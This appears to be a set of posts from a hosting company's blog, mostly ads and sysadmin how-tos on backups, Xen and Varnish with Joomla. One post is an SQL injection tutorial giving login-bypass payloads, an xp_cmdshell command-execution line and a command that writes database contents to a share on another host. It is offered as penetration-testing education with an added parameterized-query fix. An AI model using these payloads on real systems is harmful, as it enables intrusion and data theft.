Managed hosting services from Star Dot Hosting

Hello There,

This update is to highlight the managed hosting services and systems administration services offered by Star Dot Hosting.

We are proud to offer some of the highest standards of managed hosting services in the industry. Here are some of the services we offer:

- 24x7x365 Monitoring, Alerting & Trending
- 24x7x365 support ticketing system with ~15 minute response time
- Quarterly Security Auditing & Reporting
- Patch management & Maintenance
- Administration, troubleshooting, deployment and code pushes
- Hardware upgrades, deployments, expansion
- Dedicated load balancing
- Dedicated firewalls
- Database replication & clustering
- Dedicated edge content caching

Those are just some of the services we would provide to you! Our quotation process involves rigorous consultation, which includes a technology assessment and, above all, a complete understanding of how your scenario can be designed and where improvements, if any, can be made.

Feel free to click the link below to visit our managed hosting page, and fill out a quotation request form!


http://www.stardothosting.com/managed-hosting/


Backup, compress and encrypt your git repository

Greetings,

I thought I’d share a quick script in the scope of backing up GIT repositories for the purposes of encrypted and compressed off-site backups.

Unfortunately, git has no equivalent of svnadmin dump or export, whose output can conveniently be piped to stdout.

Such a command would shorten the number of commands a script needs in order to accomplish a similar task.

Find below a quick bash script that clones a repository, tars and gzips it, encrypts the archive and keeps 7 days' worth of archive files:

#!/bin/sh
# GIT Backup script
# Written by Star Dot Hosting

todaysdate=`date "+%Y-%m-%d"`
backupdir="/data/git/git-backup"
logfile="/var/log/backup.log"

# check command input
if [ -z "$1" ];
then
        echo "GIT BACKUP SCRIPT"
        echo "-----------------"
        echo ""
        echo "Usage : ./backup.sh reponame , i.e. yourdomain.git"
        echo ""
        exit 0
fi

echo "GIT Backup Log: $todaysdate" > "$logfile"
echo "----------------------------------------" >> "$logfile"
echo "" >> "$logfile"

# Find and remove archive files older than 7 days
/usr/bin/find "$backupdir" -maxdepth 1 -type f -name '*.tar.gz.enc' -mtime +7 -delete >> "$logfile" 2>&1

# Begin creating working directory to clone into
/bin/mkdir -p "$backupdir/working" >> "$logfile" 2>&1
/usr/bin/git clone "/data/git/$1" "$backupdir/working" >> "$logfile" 2>&1

# Archive working directory into an encrypted tar file named after the repo and today's date
# (the date suffix is what lets the find command above keep 7 days of archives).
# A passphrase on the command line is visible in ps output and shell history; for real
# deployments read it from a root-only file with "-pass file:/path/to/passfile" instead.
/bin/tar -czf - -C "$backupdir" working 2>> "$logfile" | /usr/bin/openssl enc -aes-256-cbc -e -pass pass:abcABC123 -out "$backupdir/$1.$todaysdate.tar.gz.enc" 2>> "$logfile"

# Remove working directory
/bin/rm -rf "$backupdir/working" >> "$logfile" 2>&1

FYI, if you ever need to decrypt one of the openssl encrypted backup archives, the command below should do the job (archives are named reponame.YYYY-MM-DD.tar.gz.enc):

openssl aes-256-cbc -d -pass pass:abcABC123 -in reponame.YYYY-MM-DD.tar.gz.enc -out decrypted.tar.gz

Clone a XEN VPS server that resides on an LVM / Logical Volume Manager

Hello!

We thought it would be worth sharing this information, as it might interest anyone who wants to replicate the same VPS across many instances, for example to build a farm of web servers.

This uses very similar concepts to our LVM XEN backup post a while back.

Step 1: Take a snapshot of the current VPS

This is simple. Use the lvcreate command with the -s option to create a snapshot of the running VPS. We assume your VPS is 5GB in size; replace that with the actual size of your VPS:

lvcreate -s -L 5GB -n snapshot_name /dev/VolGroup00/running_vps_image

Step 2: Create your new VPS

This is important. You want to create a new VPS, assign a MAC and IP address first and let the creation process fully finish. Then shut the VPS down.

Step 3: Copy the snapshot to the new VPS

All you have to do is use the dd command to transfer the snapshot image to the newly created VPS image:

dd if=/dev/VolGroup00/snapshot_name of=/dev/VolGroup00/new_vps_image

All done! Don't forget to remove the snapshot once you're done with it:

lvremove -f /dev/VolGroup00/snapshot_name

Start up the new VPS and you should have a carbon copy of the previous VPS!


Linux VPS, Virtual Hosting, XEN VPS Hosting, CPanel VPS Hosting or Managed Hosting Services

Hey there,

Before I update you on my continued experiences with Xen, KVM, Varnish, FreeBSD and all the other (exciting) things that I do, I thought I'd remind anyone here who is looking for Linux VPS hosting, virtual hosting, or specifically Xen VPS hosting or even cPanel VPS hosting, to check out our company website: www.stardothosting.com

If you're looking for managed hosting services, dedicated hosting or anything along those lines, feel free to fill out our managed hosting quotation form here: www.stardothosting.com/managed-hosting

Thanks!


Varnish Caching with Joomla

Hello There!

One of the exciting new technologies to come out in the last few years is a tremendously efficient and dynamic caching system called Varnish (see : http://www.varnish-cache.org).

We have been using Varnish in front of high traffic websites to improve the user experience as well as for redundancy and load balancing.

Varnish can do it all – complex load balancing and health polling with many different weighting methodologies for failover, as well as holding on to a “stale” cache in the event of a back end web server outage, or perhaps for geographic redundancy (holding a stale cache in a secondary data center).

One of the challenges we have faced across the many different implementations of Varnish in web stacks is dealing with dynamic and user session (i.e. “logged in”) content.

If the Internet were full of only static (see 1995) HTML files, Varnish would work beautifully out of the box. Unfortunately the web is a complicated mess of session based authentication, POSTs, GETs and query strings, among other things.

One of our recent accomplishments was getting the Joomla 1.5 content management system to work with Varnish 2.1.

The biggest challenge with Joomla was that it creates a session cookie for all users. This means a session is created and established for any guest visiting the site, and if they decide to log in, that same session is used to establish the logged in session through authentication. This is apparently an effort to deter or avoid session hijacking.

The problem with this is that Varnish ends up caching all the logged in session content, as well as the anonymous front page content.

I spent a significant amount of time fine tuning my VCL (Varnish Configuration Language) to play nice with Joomla. Unfortunately it became apparent that some minor modifications to the Joomla code were necessary in order for it to communicate properly with Varnish.

Step 1: Move the login form off the front page

I realize this might be a hard decision. I can't offer an alternative. If you have an integrated login form on the front page of your site, and you wish to cache that page with Varnish, you will likely have to choose one or the other. It would probably be ideal to replace that login form with a button that brings the user to a secondary page off the main page.

For the sake of argument, let's call our site “example.com”; the login page URL within Joomla should look like the following:

http://www.example.com/index.php?option=com_user&view=login

Take note of the login URI in this string.

The reason we need the login form on a secondary page is that we need an almost “sandboxed” section of the site where the anonymous session cookie can be established and passed through the authentication process to a logged in session. We will tell Varnish to essentially ignore this page.

Step 2: Modify Joomla to send HTTP headers for user/guest sessions

This isn't that hard. In the Joomla code there is a section that defines the HTTP headers it sends to the browser for cache variables such as expiry times and so on. I'm going to assume you have turned off the built-in Joomla caching system.

What you need to do is tell Joomla to send a special HTTP header whose value is True or False depending on whether the user is logged in. This is useful information: it allows Varnish to avoid caching any logged in content, such as “Welcome back, USERNAME” after the user is sent back to the front page from logging in.

In my Joomla installation, I modified the following file:

libraries/joomla/environment/response.php

The parent folder being the public_html / root folder of your Joomla installation. In this file, find the line that determines whether the Joomla caching system is disabled:

if (JResponse::allowCache() === false)

After this line you will see about 5 HTTP header declarations (expires, last-modified, cache-control, cache-control again and pragma). Above those declarations, add the following 6 lines of code:

$user =& JFactory::getUser();
if (!$user->guest) {
    JResponse::setHeader( 'X-Logged-In', 'True', true );
} else {
    JResponse::setHeader( 'X-Logged-In', 'False', true );
}

If you read the above code, it's fairly straightforward. I check whether the user is a guest (aka anonymous) or not. If they are logged in I send an HTTP header called “X-Logged-In” with the value “True”. If the user is not logged in, it is set to “False”.

Pretty easy, right?

This allows Varnish to avoid caching a logged in user's page.

Step 3: Configure Varnish

This is the part that took the most time during the entire process. Mind you, patching the Joomla code and whatnot took some time as well, but this step took a lot of experimentation and long hours examining session cookies and host headers.

I will break the generalized configuration directives down into two groups: VCL_RECV and VCL_FETCH.

VCL_RECV

In here, I set a bunch of IF statement directives to tell Varnish what it should look up in the cache, what it should pipe to the backend and what it should pass. This could probably be optimized and improved upon, but it works for me:

# (the iamloggedin and webfarm backends are declared elsewhere in the VCL)

# If user sends an http POST, pipe to backend
if (req.request == "POST") {
    set req.backend = iamloggedin;
    return(pipe);
}

# http authenticated sessions are piped
if (req.http.Authenticate || req.http.Authorization) {
    set req.backend = iamloggedin;
    return(pipe);
}

# if the user is coming FROM the login page, pipe to backend
if (req.http.referer ~ "(?i)(com_user|login)") {
    set req.backend = iamloggedin;
    return(pipe);
}

VCL_FETCH

The fetch section is a little bit easier. I only have about 5 directives. The first one is the most important one to look at. It “unsets” the cookie from any page on the site EXCEPT the login page. This allows Varnish to properly establish the logged in session. The subsequent rules determine what to deliver and what to pass based on URI or HTTP header checks:

# discard backend setcookie unless the URL matches the following
if (req.url !~ "(?i)(login|com_user|user|logout)") {
    unset beresp.http.Set-Cookie;
}

if (req.http.referer ~ "(?i)(com_user|login|logout)") {
    set req.backend = iamloggedin;
    return(pass);
}

if (beresp.http.x-logged-in ~ "False") {
    set req.backend = webfarm;
    return(deliver);
}

if (beresp.http.x-logged-in ~ "True") {
    set req.backend = iamloggedin;
    return(pass);
}

if (req.http.Authenticate || req.http.Authorization) {
    set req.backend = iamloggedin;
    return(pass);
}

That's it! I just saved you many sleepless nights (I hope!). Hopefully your headers will look something like this after you implement Varnish in front of Joomla:

Set-Cookie  example_auth_129bf15asdfasdf52f3afaafawef; path=/
P3P CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Logged-In False
Expires Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified   Mon, 08 Aug 2011 20:49:37 GMT
Cache-Control   post-check=0, pre-check=0
Pragma  no-cache
Content-Type    text/html; charset=utf-8
Content-Length  85898
Date    Mon, 08 Aug 2011 21:01:52 GMT
X-Varnish   761778669 761751685
Age 735
Via 1.1 varnish
Connection  keep-alive
X-Cache-Svr cache.example.com
X-Cache HIT
X-Cache-Hits    121

UPDATE : 12/08/2011

I realize I made a mistake and have corrected this post. In vcl_fetch, I had the following:

# discard backend setcookie unless the URL matches the following
if (req.url !~ "(?i)(login|com_user|user|logout)") {
    unset req.http.Set-Cookie;
}

Well, I realize I should be unsetting the Set-Cookie header on the backend response (beresp), not on the request (req). For some reason, the above (erroneous) directive works only right after you log in. If you start clicking around the site, your logged in session disappears. I suspect this is because either Joomla or Varnish is mistakenly unsetting a logged in session.

This is the correct entry (I have fixed it in my original post as well):

# discard backend setcookie unless the URL matches the following
if (req.url !~ "(?i)(login|com_user|user|logout)") {
    unset beresp.http.Set-Cookie;
}

After making the above change, I can login and browse the site and my session stays intact. Mind you, the Joomla site I am testing with is definitely not a vanilla Joomla installation.

I’d love to hear from anyone who has accomplished the above scenario either way!


New website re-design

We have re-designed our website and are very proud of the new look! Take a look for yourself:

WWW.STARDOTHOSTING.COM

Let us know what you think!


Centralized remote backup script with SSH key authentication

Greetings,

It has been a while since we posted any useful tidbits for you, so we have decided to share one of our quick & dirty centralized backup scripts.

The script relies on ssh key based authentication, described here on this blog. It parses a configuration file where the fields are separated by commas and the directory list by colons, as in the example config here:

hostname1,192.168.1.1,etc:var:root
hostname2,192.168.1.2,etc:var:root:usr

Note the intended backup directories in the 3rd field, separated by colons. Simply populate the backup-hosts.txt config file (located in the same folder as the script) with all the hosts you want backed up.

The script then connects to each host over ssh and streams a tar -czf archive back over the (encrypted) ssh connection, to be written to the destination of your choice. Ideally you should centralize this script on a box that has direct access to a lot of disk space.

Here is the script:

#!/bin/sh
# Centralized Linux Backup Script
# By Star Dot Hosting , www.stardothosting.com
# Uses SSH Key based authentication and remote ssh commands to tar.gz folders to iSCSI storage

todaysdate=`date "+%Y-%m-%d %H:%M:%S"`
backupdest="/backups/linux-backups"
hostsfile="/usr/local/bin/backup-hosts.txt"
logfile="/var/log/linux-backup.log"

echo "Centralized Linux Backup: $todaysdate" > "$logfile"
echo "----------------------------------------------" >> "$logfile"
echo "" >> "$logfile"

# Config format, one host per line: name,address,dir1:dir2:dir3 (lines starting with # are ignored)
grep -v '^#' "$hostsfile" | while IFS=, read -r backupname obj0 dirs
do
        [ -z "$obj0" ] && continue
        # Split the colon-separated directory list into one entry per iteration
        for obj1 in $(echo "$dirs" | tr ':' ' ')
        do
                echo "backing up $obj0 with $obj1 directory" >> "$logfile"
                # Stream the tarball over ssh straight into the destination file. Only stdout (the
                # archive) goes to the .tar.gz; stderr goes to the log so errors cannot corrupt the
                # archive. -n stops ssh from swallowing the rest of the host list on stdin.
                ssh -n -l root "$obj0" "tar -czf - -C /$obj1 ." > "$backupdest/$backupname.$obj1.tar.gz" 2>> "$logfile"
                if [ "$?" -ne 0 ]
                then
                        echo "There were some errors while backing up $obj0 / $backupname within the $obj1 directory" >> "$logfile"
                        #exit 1
                else
                        echo "Backup completed on $obj0 / $backupname while backing up $obj1 directory" >> "$logfile"
                fi
        done
done

echo "Backup Script Completed." >> "$logfile"
mail -s "Centralized Backup Complete" topsoperations@topscms.com < "$logfile"

You could modify this script to keep separate daily backups, pruned to keep only X days' worth (e.g. only 7 days). There is a lot you can do here.

If you have a handful of Linux or BSD servers that you would like to back up to a centralized location, without having an individual script to maintain on each server, then perhaps you could use or modify this script to suit your needs.

I hope this helps.


50% off any hosting plan for the first THREE months!

We are excited about a new promotion for our web hosting catalog here at *.hosting.

We are offering a 50% discount on ANY of our SHARED or VPS hosting plans for the first 3 (that's THREE) months!!!!

Simply enter the following promotional code during the signup process:

SDH50OFF2010

It's that simple! The 50% discount will then be immediately applied to the first three months of hosting — no matter which hosting plan you choose!

View our hosting plans here

Happy Holidays from Star Dot Hosting!


Security Penetration Testing Series : SQL Injection

I am starting a series of blog posts that detail security related strategies, penetration testing and best practice methodologies. To start our series, I am going to delve into the world of SQL injection techniques and a general overview for those who are looking to learn a little more about this method of injection.

There is already quite a bit of documentation out there regarding this, so I hope this post isn't too redundant. There are a lot of tools out there to assist in accomplishing this task, or at the very least tools that automate the probing and injection of SQL into publicly facing websites, forms and the like.

The tool I'll mention is SQLMAP (http://sqlmap.sourceforge.net/). SQLMAP is an “open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.”

This article does not introduce anything new; SQL injection has been widely written about and used in the wild. I thought I'd write this article to document some of the SQL injection methods and hope that it may be of use to some of you out there in cyberspace.

What is SQL injection anyway?

It is a technique for injecting SQL queries or commands through an application's inputs, typically via web pages. Many web pages take parameters from the user and build a SQL query to the database from them. Take a login page, for instance: it takes the user name and password and issues a SQL query to check whether that user name and password are valid. With SQL injection, a crafted user name and/or password can change the SQL query and thus grant something other than what was intended.

What do you need?

Technically all you need is a web browser.

What should I look for?

Web forms. Any input area of a website that interacts with its database backend; it could be a login form, a search form or anything like that.

You could also look for pages that carry query strings in the URL, such as:

http://whatever.com/index.asp?id=10

Testing if it's vulnerable

With those query string URLs or web forms, you can do a simple test to see whether the input is vulnerable to injection. Start with the “single quote trick”, something like this:

hi' or 1=1--

For example :

http://whatever.com/index.asp?id=hi' or 1=1--

If you do that in a login form, for example, and it works, you will be logged in without any password.

Why ' or 1=1--?

Let us look at another example of why ' or 1=1-- is important. Other than bypassing a login, it can also expose extra information that is not normally available. Take an ASP page that links to another page with the following URL:

http://whatever.com/index.asp?category=food

In the URL, 'category' is the variable name and 'food' is the value assigned to it. To handle that, an ASP page might contain the following code (this is the actual code we wrote for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, the request value lands in v_cat and the SQL statement becomes:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, ‘food’.

Now, assume that we change the URL into something like this:

http://whatever.com/index.asp?category=food' or 1=1--

Now our variable v_cat equals “food' or 1=1--”; if we substitute this into the SQL query, we get:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now selects everything from the product table regardless of whether PCategory equals 'food'. The double dash “--” tells MS SQL Server to ignore the rest of the query, which gets rid of the trailing single quote ('). Sometimes it may be possible to replace the double dash with a single hash “#”.

However, if the backend is not MS SQL Server, or you simply cannot comment out the rest of the query, you may also try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
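As an added example (not the page's ASP code), here is the vulnerable concatenation from the snippet above beside its parameterized fix, run against an in-memory SQLite database with constructed sample rows standing in for MS SQL Server. SQLite shares the single-quote string and -- comment syntax the explanation relies on, so the inputs listed above behave the same way.

```python
import sqlite3

# Constructed sample rows standing in for the page's "product" table.
SAMPLE_PRODUCTS = [
    ("Apple", "food"),
    ("Bread", "food"),
    ("Hammer", "tools"),
    ("Lamp", "furniture"),
]

# Inputs taken from the list above, plus the legitimate value "food".
TEST_INPUTS = [
    "food",
    "food' or 1=1--",
    "food' or 'a'='a",
    "' or 1=1--",
    "\" or 1=1--",
    "') or ('a'='a",
]


def make_db():
    """Build an in-memory database with the product/PCategory schema from the ASP example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (name TEXT, PCategory TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)", SAMPLE_PRODUCTS)
    return conn


def vulnerable_lookup(conn, v_cat):
    """Mirrors the ASP snippet: v_cat is spliced into the SQL text, so a quote
    or comment marker inside it rewrites the WHERE clause."""
    sqlstr = "SELECT name FROM product WHERE PCategory='" + v_cat + "'"
    return sorted(row[0] for row in conn.execute(sqlstr))


def safe_lookup(conn, v_cat):
    """Hardened form: the SQL text is fixed and v_cat is bound as a parameter,
    so whatever it contains is only ever compared against PCategory."""
    sqlstr = "SELECT name FROM product WHERE PCategory=?"
    return sorted(row[0] for row in conn.execute(sqlstr, (v_cat,)))


def compare_inputs(conn, inputs):
    """Return {input: (vulnerable row count or 'error', parameterized row count)}.
    'error' means the injected text produced malformed SQL; in production that
    database error in the logs is itself a signal worth alerting on."""
    results = {}
    for value in inputs:
        try:
            vuln = len(vulnerable_lookup(conn, value))
        except sqlite3.Error:
            vuln = "error"
        results[value] = (vuln, len(safe_lookup(conn, value)))
    return results


if __name__ == "__main__":
    db = make_db()
    for value, (vuln, safe) in compare_inputs(db, TEST_INPUTS).items():
        print(f"{value!r:24} concatenated={vuln!s:6} parameterized={safe}")
```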

Remote execution with SQL injection

Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. Stored procedures like master..xp_cmdshell can then be used to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using a double quote (") if the single quote (') is not working.

The semicolon ends the current SQL query and thus allows a new SQL command to start. To verify that the command executed successfully, listen for ICMP packets on 10.10.1.2 and check whether any arrive from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get an error message indicating a permission problem, it is possible that the administrator has limited the web user's access to these stored procedures.

Getting the output of my SQL query

It is possible to use sp_makewebtask to write your query results into an HTML file:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the host at 10.10.1.3 must have a folder “share” shared for Everyone.

Hope this helps!


Migrate from Linux to Xen with Rsync

I decided to write this little guide to provide the relatively simple steps needed to migrate your linux system to a Xen (HVM) virtual instance.

It is assumed that your source and destination boxes each have only one root “/” partition. If you partitioned your file system differently, you will have to adapt these instructions accordingly.

The following steps walk you through the process of migrating linux to Xen from start to finish :

1. Install the exact same version of linux on your destination server
This isn't really 100% necessary, obviously. You could always boot into Finnix, partition your disk and install Grub. If you are uncomfortable doing that, install the distribution from start to finish; the file system will be overwritten anyway.

2. Boot into Finnix on the destination system
If you have never used Finnix, it is a “self contained, bootable linux distribution”. I like it a lot and have used it for similar purposes, rescue operations and the like.

3. Setup networking on both destination and source systems
If both systems are on the same network, you could assign local IP addresses to ensure the process of synchronisation is speedy and unobstructed.

Either way, configure networking, set a root password and start ssh:

passwd
/etc/init.d/ssh start

4. Mount the partition that you want to copy to on the destination server
Remember, so far everything you are doing has been on the destination server. Create a mount point and mount the destination partition within Finnix (this is the path the rsync command in step 5 writes to):

mkdir -p /mnt/xvdb
mount /dev/xvdb /mnt/xvdb

5. On the source server, rsync all the files of the source partition to the destination partition
When logged into the source server, issue the following rsync command and point it at the destination server's partition you just mounted (-x keeps rsync on the root filesystem, so pseudo-filesystems such as /proc and /sys are not copied):

rsync -aHSKDvxz -e ssh / root@12.34.56.78:/mnt/xvdb/

The rsync process will complete and the partition on the destination server should be ready to boot into. Remember to change the networking configuration if you don't want any IP conflicts.

I hope this helps!
